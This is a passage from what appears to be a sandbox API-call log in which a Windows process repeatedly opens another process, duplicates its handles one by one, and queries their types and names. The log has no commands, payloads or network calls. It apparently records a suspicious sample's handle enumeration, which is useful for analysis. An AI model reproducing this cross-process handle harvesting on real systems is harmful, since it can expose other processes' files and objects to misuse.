dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.437] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.438] CloseHandle (hObject=0x1b8) returned 1 [0113.438] CloseHandle (hObject=0x198) returned 1 [0113.438] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.438] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.438] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.438] CloseHandle (hObject=0x1b8) returned 1 [0113.438] CloseHandle (hObject=0x198) returned 1 [0113.438] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.438] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.439] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.439] CloseHandle (hObject=0x1b8) returned 1 [0113.439] CloseHandle (hObject=0x198) returned 1 [0113.439] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.439] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.439] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.439] CloseHandle (hObject=0x1b8) returned 1 [0113.439] CloseHandle (hObject=0x198) returned 1 [0113.439] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.439] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.440] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.440] CloseHandle (hObject=0x1b8) returned 1 [0113.440] CloseHandle (hObject=0x198) returned 1 [0113.440] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.440] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.440] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.440] CloseHandle (hObject=0x1b8) returned 1 [0113.440] CloseHandle (hObject=0x198) returned 1 [0113.440] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.440] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.441] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.441] CloseHandle (hObject=0x1b8) returned 1 [0113.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.451] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.452] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.453] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.453] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.454] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.455] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.459] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.460] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.461] GetTickCount () returned 0xe8644f [0113.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.461] GetTickCount () returned 0xe8644f [0113.461] CloseHandle (hObject=0x1b8) returned 1 [0113.461] GetTickCount () returned 0xe8644f [0113.461] GetTickCount () returned 0xe8644f [0113.461] GetTickCount () returned 0xe8644f [0113.461] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.461] GetTickCount () returned 0xe8644f [0113.461] GetTickCount () returned 0xe8644f [0113.461] CloseHandle (hObject=0x1b8) returned 1 [0113.462] GetTickCount () returned 0xe8644f [0113.462] GetTickCount () returned 0xe8644f [0113.462] GetTickCount () returned 0xe8644f [0113.462] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.462] GetTickCount () returned 0xe8644f [0113.462] GetTickCount () returned 0xe8644f [0113.462] CloseHandle (hObject=0x1b8) returned 1 [0113.462] GetTickCount () returned 0xe8644f [0113.462] GetTickCount () returned 0xe8644f [0113.462] GetTickCount () returned 0xe8644f [0113.462] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.462] GetTickCount () returned 0xe8644f [0113.463] GetTickCount () returned 0xe8644f [0113.463] CloseHandle (hObject=0x1b8) returned 1 [0113.463] GetTickCount () returned 0xe8644f [0113.463] GetTickCount () returned 0xe8644f [0113.463] GetTickCount () returned 0xe8644f [0113.463] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.463] GetTickCount () returned 0xe8644f [0113.463] GetTickCount () returned 0xe8644f [0113.463] CloseHandle (hObject=0x1b8) returned 1 [0113.463] GetTickCount () returned 0xe8644f [0113.464] GetTickCount () returned 0xe8644f [0113.464] GetTickCount () returned 0xe8644f [0113.464] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.464] GetTickCount () returned 0xe8644f [0113.464] GetTickCount () returned 0xe8644f [0113.464] CloseHandle (hObject=0x1b8) returned 1 [0113.464] GetTickCount () returned 0xe8644f [0113.464] GetTickCount () returned 0xe8644f [0113.464] GetTickCount () returned 0xe8644f [0113.464] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.464] GetTickCount () returned 0xe8644f [0113.465] GetTickCount () returned 0xe8644f [0113.465] CloseHandle (hObject=0x1b8) returned 1 [0113.465] GetTickCount () returned 0xe8644f [0113.465] GetTickCount () returned 0xe8644f [0113.465] GetTickCount () returned 0xe8644f [0113.465] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.465] GetTickCount () returned 0xe8644f [0113.465] GetTickCount () returned 0xe8644f [0113.465] CloseHandle (hObject=0x1b8) returned 1 [0113.465] GetTickCount () returned 0xe8644f [0113.465] GetTickCount () returned 0xe8644f [0113.466] GetTickCount () returned 0xe8644f [0113.466] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.466] GetTickCount () returned 0xe8644f [0113.466] GetTickCount () returned 0xe8644f [0113.466] CloseHandle (hObject=0x1b8) returned 1 [0113.466] GetTickCount () returned 0xe8644f [0113.466] GetTickCount () returned 0xe8644f [0113.466] GetTickCount () returned 0xe8644f [0113.466] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.466] GetTickCount () returned 0xe8644f [0113.467] GetTickCount () returned 0xe8644f [0113.467] CloseHandle (hObject=0x1b8) returned 1 [0113.467] GetTickCount () returned 0xe8644f [0113.467] GetTickCount () returned 0xe8644f [0113.467] GetTickCount () returned 0xe8644f [0113.467] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.467] GetTickCount () returned 0xe8644f [0113.467] GetTickCount () returned 0xe8644f [0113.467] CloseHandle (hObject=0x1b8) returned 1 [0113.467] GetTickCount () returned 0xe8644f [0113.467] GetTickCount () returned 0xe8644f [0113.467] GetTickCount () returned 0xe8644f [0113.468] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.468] GetTickCount () returned 0xe8644f [0113.468] GetTickCount () returned 0xe8644f [0113.468] CloseHandle (hObject=0x1b8) returned 1 [0113.468] GetTickCount () returned 0xe8644f [0113.468] GetTickCount () returned 0xe8644f [0113.468] GetTickCount () returned 0xe8644f [0113.468] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.468] GetTickCount () returned 0xe8644f [0113.468] GetTickCount () returned 0xe8644f [0113.468] CloseHandle (hObject=0x1b8) returned 1 [0113.468] GetTickCount () returned 0xe8644f [0113.469] GetTickCount () returned 0xe8644f [0113.469] GetTickCount () returned 0xe8644f [0113.469] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.469] GetTickCount () returned 0xe8644f [0113.469] GetTickCount () returned 0xe8644f [0113.469] CloseHandle (hObject=0x1b8) returned 1 [0113.469] GetTickCount () returned 0xe8644f [0113.469] GetTickCount () returned 0xe8644f [0113.469] GetTickCount () returned 0xe8644f [0113.469] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.470] GetTickCount () returned 0xe8644f [0113.470] GetTickCount () returned 0xe8644f [0113.470] CloseHandle (hObject=0x1b8) returned 1 [0113.470] GetTickCount () returned 0xe8644f [0113.470] GetTickCount () returned 0xe8644f [0113.470] GetTickCount () returned 0xe8644f [0113.470] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.470] GetTickCount () returned 0xe8644f [0113.470] GetTickCount () returned 0xe8644f [0113.470] CloseHandle (hObject=0x1b8) returned 1 [0113.470] GetTickCount () returned 0xe8644f [0113.470] GetTickCount () returned 0xe8644f [0113.471] GetTickCount () returned 0xe8644f [0113.471] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.471] GetTickCount () returned 0xe8644f [0113.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.471] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.471] GetTickCount () returned 0xe8644f [0113.471] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.471] GetTickCount () returned 0xe8644f [0113.471] CloseHandle (hObject=0x1b8) returned 1 [0113.471] GetTickCount () returned 0xe8644f [0113.471] GetTickCount () returned 0xe8644f [0113.471] GetTickCount () returned 0xe8644f [0113.472] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.472] GetTickCount () returned 0xe8644f [0113.472] GetTickCount () returned 0xe8644f [0113.472] CloseHandle (hObject=0x1b8) returned 1 [0113.472] GetTickCount () returned 0xe8644f [0113.472] GetTickCount () returned 0xe8644f [0113.472] GetTickCount () returned 0xe8644f [0113.472] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.472] GetTickCount () returned 0xe8644f [0113.472] GetTickCount () returned 0xe8644f [0113.472] CloseHandle (hObject=0x1b8) returned 1 [0113.472] GetTickCount () returned 0xe8644f [0113.473] GetTickCount () returned 0xe8644f [0113.473] GetTickCount () returned 0xe8644f [0113.473] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.473] GetTickCount () returned 0xe8644f [0113.473] GetTickCount () returned 0xe8644f [0113.473] CloseHandle (hObject=0x1b8) returned 1 [0113.473] GetTickCount () returned 0xe8644f [0113.473] GetTickCount () returned 0xe8644f [0113.473] GetTickCount () returned 0xe8644f [0113.473] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.473] GetTickCount () returned 0xe8644f [0113.474] GetTickCount () returned 0xe8644f [0113.474] CloseHandle (hObject=0x1b8) returned 1 [0113.474] GetTickCount () returned 0xe8644f [0113.474] GetTickCount () returned 0xe8644f [0113.474] GetTickCount () returned 0xe8644f [0113.474] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.474] GetTickCount () returned 0xe8644f [0113.474] GetTickCount () returned 0xe8644f [0113.475] CloseHandle (hObject=0x1b8) returned 1 [0113.475] GetTickCount () returned 0xe8644f [0113.475] GetTickCount () returned 0xe8644f [0113.475] GetTickCount () returned 0xe8644f [0113.475] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.475] GetTickCount () returned 0xe8644f [0113.475] GetTickCount () returned 0xe8644f [0113.475] CloseHandle (hObject=0x1b8) returned 1 [0113.475] GetTickCount () returned 0xe8644f [0113.475] GetTickCount () returned 0xe8644f [0113.475] GetTickCount () returned 0xe8644f [0113.476] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.476] GetTickCount () returned 0xe8644f [0113.476] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.476] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.476] GetTickCount () returned 0xe8644f [0113.476] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.476] GetTickCount () returned 0xe8645e [0113.476] CloseHandle (hObject=0x1b8) returned 1 [0113.476] GetTickCount () returned 0xe8645e [0113.476] GetTickCount () returned 0xe8645e [0113.476] GetTickCount () returned 0xe8645e [0113.477] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.477] GetTickCount () returned 0xe8645e [0113.477] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.477] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.477] GetTickCount () returned 0xe8645e [0113.477] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.477] GetTickCount () returned 0xe8645e [0113.477] CloseHandle (hObject=0x1b8) returned 1 [0113.477] GetTickCount () returned 0xe8645e [0113.477] GetTickCount () returned 0xe8645e [0113.477] GetTickCount () returned 0xe8645e [0113.478] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.478] GetTickCount () returned 0xe8645e [0113.478] GetTickCount () returned 0xe8645e [0113.478] CloseHandle (hObject=0x1b8) returned 1 [0113.478] GetTickCount () returned 0xe8645e [0113.478] GetTickCount () returned 0xe8645e [0113.478] GetTickCount () returned 0xe8645e [0113.478] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.478] GetTickCount () returned 0xe8645e [0113.478] GetTickCount () returned 0xe8645e [0113.478] CloseHandle (hObject=0x1b8) returned 1 [0113.478] GetTickCount () returned 0xe8645e [0113.479] GetTickCount () returned 0xe8645e [0113.479] GetTickCount () returned 0xe8645e [0113.479] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.479] GetTickCount () returned 0xe8645e [0113.479] GetTickCount () returned 0xe8645e [0113.479] CloseHandle (hObject=0x1b8) returned 1 [0113.479] GetTickCount () returned 0xe8645e [0113.479] GetTickCount () returned 0xe8645e [0113.479] GetTickCount () returned 0xe8645e [0113.479] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.479] GetTickCount () returned 0xe8645e [0113.479] GetTickCount () returned 0xe8645e [0113.480] CloseHandle (hObject=0x1b8) returned 1 [0113.480] GetTickCount () returned 0xe8645e [0113.480] GetTickCount () returned 0xe8645e [0113.480] GetTickCount () returned 0xe8645e [0113.480] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.480] GetTickCount () returned 0xe8645e [0113.480] GetTickCount () returned 0xe8645e [0113.480] CloseHandle (hObject=0x1b8) returned 1 [0113.480] GetTickCount () returned 0xe8645e [0113.480] GetTickCount () returned 0xe8645e [0113.480] GetTickCount () returned 0xe8645e [0113.480] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.481] GetTickCount () returned 0xe8645e [0113.481] GetTickCount () returned 0xe8645e [0113.481] CloseHandle (hObject=0x1b8) returned 1 [0113.481] GetTickCount () returned 0xe8645e [0113.481] GetTickCount () returned 0xe8645e [0113.481] GetTickCount () returned 0xe8645e [0113.481] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.481] GetTickCount () returned 0xe8645e [0113.481] GetTickCount () returned 0xe8645e [0113.481] CloseHandle (hObject=0x1b8) returned 1 [0113.481] GetTickCount () returned 0xe8645e [0113.481] GetTickCount () returned 0xe8645e [0113.481] GetTickCount () returned 0xe8645e [0113.482] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.482] GetTickCount () returned 0xe8645e [0113.482] GetTickCount () returned 0xe8645e [0113.482] CloseHandle (hObject=0x1b8) returned 1 [0113.482] GetTickCount () returned 0xe8645e [0113.482] GetTickCount () returned 0xe8645e [0113.482] GetTickCount () returned 0xe8645e [0113.482] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.482] GetTickCount () returned 0xe8645e [0113.482] GetTickCount () returned 0xe8645e [0113.482] CloseHandle (hObject=0x1b8) returned 1 [0113.482] GetTickCount () returned 0xe8645e [0113.482] GetTickCount () returned 0xe8645e [0113.483] GetTickCount () returned 0xe8645e [0113.483] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.483] GetTickCount () returned 0xe8645e [0113.483] GetTickCount () returned 0xe8645e [0113.483] CloseHandle (hObject=0x1b8) returned 1 [0113.483] GetTickCount () returned 0xe8645e [0113.483] GetTickCount () returned 0xe8645e [0113.483] GetTickCount () returned 0xe8645e [0113.483] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.483] GetTickCount () returned 0xe8645e [0113.483] GetTickCount () returned 0xe8645e [0113.483] CloseHandle (hObject=0x1b8) returned 1 [0113.483] GetTickCount () returned 0xe8645e [0113.484] GetTickCount () returned 0xe8645e [0113.484] GetTickCount () returned 0xe8645e [0113.484] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.484] GetTickCount () returned 0xe8645e [0113.484] GetTickCount () returned 0xe8645e [0113.484] CloseHandle (hObject=0x1b8) returned 1 [0113.484] GetTickCount () returned 0xe8645e [0113.484] GetTickCount () returned 0xe8645e [0113.484] GetTickCount () returned 0xe8645e [0113.484] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.484] GetTickCount () returned 0xe8645e [0113.484] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.484] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.484] GetTickCount () returned 0xe8645e [0113.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.485] GetTickCount () returned 0xe8645e [0113.485] CloseHandle (hObject=0x1b8) returned 1 [0113.485] GetTickCount () returned 0xe8645e [0113.485] GetTickCount () returned 0xe8645e [0113.485] GetTickCount () returned 0xe8645e [0113.485] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.485] GetTickCount () returned 0xe8645e [0113.485] GetTickCount () returned 0xe8645e [0113.485] CloseHandle (hObject=0x1b8) returned 1 [0113.485] GetTickCount () returned 0xe8645e [0113.485] GetTickCount () returned 0xe8645e [0113.485] GetTickCount () returned 0xe8645e [0113.486] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.486] GetTickCount () returned 0xe8645e [0113.486] GetTickCount () returned 0xe8645e [0113.486] CloseHandle (hObject=0x1b8) returned 1 [0113.486] GetTickCount () returned 0xe8645e [0113.486] GetTickCount () returned 0xe8645e [0113.486] GetTickCount () returned 0xe8645e [0113.486] NtQueryObject (in: 